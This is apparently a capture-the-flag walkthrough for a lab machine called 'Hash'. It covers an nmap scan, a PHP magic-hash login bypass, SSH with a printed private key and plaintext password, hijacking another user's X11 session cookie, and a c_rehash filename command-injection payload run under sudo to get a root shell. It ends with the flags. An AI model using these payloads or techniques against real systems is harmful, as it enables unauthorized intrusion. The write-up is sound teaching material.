Nmap Results

# Nmap 7.98 scan initiated Fri Feb  6 15:55:11 2026 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.15
Nmap scan report for 10.9.9.15
Host is up (0.00056s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1e:fb:86:3d:cf:26:a2:a0:ae:b0:00:61:0b:41:cb:ab (RSA)
|   256 80:8e:46:7b:1d:6e:13:74:22:89:ad:91:b4:44:64:ec (ECDSA)
|_  256 71:e5:e1:4f:34:16:de:ec:b5:c4:fe:f5:0a:a2:ee:fc (ED25519)
80/tcp   open  http          nginx 1.14.2
|_http-title: LOGIN
|_http-server-header: nginx/1.14.2
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Service Info: OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb  6 15:55:25 2026 -- 1 IP address (1 host up) scanned in 13.66 seconds

echo -e '10.9.9.15\t\thash.hmv' | sudo tee -a /etc/hosts

Service Enumeration

TCP/80

The form makes a HTTP POST request to /check.php. There's also an interesting comment in the source, indicating the presence of a .bak file.

Looking for the .bak File

grep -v '^#' /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-medium.txt > wordlist.txt

ffuf -u 'http://hash.hmv/FUZZ' -w wordlist.txt:FUZZ -e '.bak' -fs 453

check.bak               [Status: 200, Size: 273, Words: 26, Lines: 15, Duration: 0ms]

curl -s 'http://hash.hmv/check.bak' -O

Understanding the PHP Script

In the PHP script, you have the following comparison operation:

if ($passwordhashed == '0e0001337') {

• This is a loose comparison in PHP looking at two strings
• In mathematics and many programming languages, the notation 0e0001337 typically denotes scientific notation, so PHP converts this string to float using 0 x 0^1337. And, this equation evaluates to 0
• In SHA-256, there is the concept of a magic value that will consistently create a hash starting with 0e...
  • The hash('sha256',$pass); function in PHP hashes an input with SHA-256
  • The magic input to create a hash starting with 0e is 34250003024812
  • This will result in the hash 0e46289032038065916139621039085883773413820991920706299695051332
  • In the string comparison operation, this will be converted to float as well 0 x 0^46289..., which also evaluates to 0
• Since both are converted to floats in the comparison operation, and 0 = 0, this allows us to bypass authentication

if ($passwordhashed == '0e0001337') {

if ($passwordhashed === '0e0001337') {

Bypass the Authentication Check

Exploit

SSH as Marco

cat << 'EOF' > marco_key
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAxiKdFmWJiVfVYaNGov1xuh0/nrXnNsx2s6g5IoIJrmkX+9qzt2US
ZWMgrjLzAyB3wrLFysCPh4F8GU87pJkbpc0prM/8vB2WJCg5ktDQ6o0vwH219sPKUS4e9R
s2bPz7CJX5bzFDQ3B6ZUOs1itZ1t/uq38XuCxDjI8XxU6fusB3Rjz2XIombtFwo78W1pkX
VnQhzZOQ+b8UaC5lZeKatcZ0xdc0iQgiAbcRN7sXYCDMxMmo9KsxqzWjd56hLrv1nsTy2t
VBXzDRw+5JU4AJlGDRB/Upq/oKbGDCOmgNUsJPQKW4TgEAWhUa+t/ue2Bs/wFjCY7w/LkY
pK4bnY5eHQAAA8C/pv23v6b9twAAAAdzc2gtcnNhAAABAQDGIp0WZYmJV9Vho0ai/XG6HT
+etec2zHazqDkiggmuaRf72rO3ZRJlYyCuMvMDIHfCssXKwI+HgXwZTzukmRulzSmsz/y8
HZYkKDmS0NDqjS/AfbX2w8pRLh71GzZs/PsIlflvMUNDcHplQ6zWK1nW3+6rfxe4LEOMjx
fFTp+6wHdGPPZciiZu0XCjvxbWmRdWdCHNk5D5vxRoLmVl4pq1xnTF1zSJCCIBtxE3uxdg
IMzEyaj0qzGrNaN3nqEuu/WexPLa1UFfMNHD7klTgAmUYNEH9Smr+gpsYMI6aA1Swk9Apb
hOAQBaFRr63+57YGz/AWMJjvD8uRikrhudjl4dAAAAAwEAAQAAAQEAlMcLA/VMmGfu33kW
Im+DRUiPLCLVMo3HmFH6TRIuKNvbWY+4oT5w2NbdhFDXr4Jiyz0oTn3XiN3PDMY1N/yMCS
0MXSp0UeE5i3709Gx+Y5GOyNDcoSYVtm2Wa2B6ts4jxievfDIWmv5LudxeXReCR1oxQm+V
pQL/2fzc0ZifUj+/VSSIltgDKHxEfebfK0xShgXTSlUhickSapre2ArSdplM/rYvZLDWmd
iGkGD3VnAgRtloy5v32vPI3M++OCrHbLxgff4odAjawejPPHVj3beMgCrqwb/CCNKEyWKc
Jkjjt7nY/GUW4RfzM34LplezpmvrsLkTVMAb3KflDkDPFQAAAIBrP6Pnz0t8d/M+4hEb66
IkrftwqMC+c8Z0HMGURTMco7jXfoXaVP3eWCafEZ/RobZm0Ob1mnBZ574Qn8ai5VLPyJz6
5Ibe1Z6LWu6yCL/VFNyksnVARIuVjQt9pXpzbXOfn0H4ZHRBFyRhNHGjnft1PA59O30Dpw
UVz9eO3K2EqQAAAIEA4baQFa4RYnZ/YK4F6acjsAPhk88poLjDT86eCQ08wO5+d8BGuSHE
+BAqCZJuJTvvozYpZ5NFW4OEG9+T/HX2tvB6Ucc1pbQNNnB7CBp/VoLLTW+nuU3YJbgYlx
VnWRRudD6K7wjZEHJ44XzLdTy2wyeUvZw/iJRZmqQ5hxXCD1MAAACBAOC4ucZotWaq/pb5
V5RqLV8HU+DWFHAIfvqtYI5wCcZmAjGtXgLF1HY9MZ3bRPz2/m7cB44cdgCRbtmqBvnOvn
6h9AS4gr1HOJEpjgohkxBTc2Mf/dpCCdcNCX2Xy5ExPSilbS2rUHHCIU2J/yZGTths8fBR
cEjmSYvt0qFY/t7PAAAACm1hcmNvQGhhc2g=
-----END OPENSSH PRIVATE KEY-----
EOF

chmod 600 marco_key

Post-Exploit Enumeration

Operating Environment

Linux hash 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux

PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

uid=1000(marco) gid=1000(marco) groups=1000(marco),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Sorry, user marco may not run sudo on hash.

Users and Groups

maria:x:1001:1001:,,,:/home/maria:/bin/bash

maria:x:1001:

Network Configurations

ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether bc:24:11:f9:29:55 brd ff:ff:ff:ff:ff:ff
    inet 10.9.9.15/24 brd 10.9.9.255 scope global dynamic noprefixroute ens18
       valid_lft 6127sec preferred_lft 6127sec
    inet6 fe80::be24:11ff:fef9:2955/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

Processes and Services

./pspy64 > log.txt &

2026/02/06 18:09:01 CMD: UID=1001  PID=3578   | /bin/sh -c /home/maria/myterm.sh 
2026/02/06 18:09:01 CMD: UID=1001  PID=3579   | /bin/sh /home/maria/myterm.sh

Interesting Files

find / -type f -perm /4000 -exec ls -l {} \; 2>/dev/null

-rwsr-xr-x 1 root root 55400 Mar  6  2019 /usr/bin/bwrap

find / -path /proc -prune -o -path /sys -prune -o -type f -writable -ls 2>/dev/null

     2362      0 -rwxrwxrwx   1 maria    maria           0 Feb  5  2021 /home/maria/.Xauthority
     2299      4 -rw-r--r--   1 marco    marco          15 Feb  5  2021 /home/marco/.x

cat /home/marco/.x

marcothehasher

find / -type f -user maria -exec ls -l {} \; 2>/dev/null

-rwxr-xr-x 1 maria maria 25 Feb  5  2021 /home/maria/myterm.sh

grep -r maria /home/marco

.cache/sessions/xfwm4-2536e4334-541a-4929-996f-cb316d1bff04.state:  [WM_NAME] Terminal - maria@hash: ~

Privilege Escalation

Lateral to Maria

Globally Writable X11 Session

During the post-exploit enumeration phase, we found some evidence that points us in this direction:

• tcp/3389 is open on the target (XRDP server)
• Globally writable X11 session cookie for maria
• A script that starts xterm as maria on DISPLAY=:10

xfreerdp3 /v:'hash.hmv' /u:'marco' /p:'marcothehasher'

cp /home/marco/.Xauthority /home/maria/.Xauthority

Add a SSH Key

ssh-keygen -t rsa -b 4096 -f /tmp/maria -C "" -N ""

mkdir /home/maria/.ssh

cat /tmp/maria.pub >> /home/maria/.ssh/authorized_keys

chmod +r /tmp/maria

Lateral to Root

Understanding the Exploit

Given a directory, c_rehash will scan for certificates, calculate their hash values and create symbolic links of the certificates using the certificate hash values in that same directory.

c_rehash first looks for the --—BEGIN (.*)--— string to ensure it's processing a certificate file. Then, it returns ($is_cert, $is_crl) depending on the file type.

Proof of Concept

mkdir /home/maria/pwn

openssl req -new -newkey rsa:4096 -x509 -sha256 -days 3650 -nodes -out /home/maria/pwn/test.pem -keyout /home/maria/pwn/test.key

cd /home/maria/pwn

mv test.pem 'test.pem`touch /home/maria/pwn/pwned.txt`'

sudo /usr/bin/c_rehash .

mv 'test.pem`touch /home/maria/pwn/pwned.txt`' 'test.pem`bash -ip 1>&2`'

Flags

hashmanready

hashhater